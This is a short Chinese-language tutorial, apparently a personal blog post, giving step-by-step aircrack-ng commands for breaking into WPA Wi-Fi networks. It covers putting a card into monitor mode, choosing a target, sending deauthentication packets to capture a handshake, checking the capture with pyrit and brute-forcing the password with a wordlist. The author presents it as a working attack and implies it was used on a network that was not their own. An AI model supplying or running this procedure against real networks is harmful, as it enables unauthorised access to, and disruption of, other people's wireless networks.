默認配置的路由器,8位以下密碼,黑客幾分鍾就可以破解。
以前用自己的路由器做過實驗,這次真正實踐成功。
環境:Kali Linux
工具集:aircrack-ng
(打開終端)
airmon-ng
查看並記錄要使用的網卡Interface名,我的是wlan0。
airmon-ng start wlan0
啟動監聽模式,Interface為wlan0mon。
airodump-ng wlan0mon
開始監聽。 確定目標后按ctrl+c退出。記錄下目標的BSSID和頻道號CH。
airodump-ng -c [頻道號] --bssid [BSSID] -w [保存文件名] wlan0mon
監聽數據包。
(另開終端)
aireplay-ng -0 10 -a [BSSID] wlan0mon
開始Deauth攻擊,次數10。
觀察之前的終端,當右上角出現Handshake,代表已經抓取到握手包,按ctrl+c退出。
在主文件夾查看取得的.cap文件。
pyrit -r [文件名] analyze
分析是否捕獲到good握手包。
pyrit -r [文件名] -o [新文件名] strip
精簡數據包。
取得所需的.cap數據包,如果需要,轉移到運行暴力破解的電腦上。
准備好字典文件,一般至少要5M以上的,5M不需要多久就能跑完。
aircrack-ng -w [字典文件] [cap文件]
運行暴力破解,等待結果。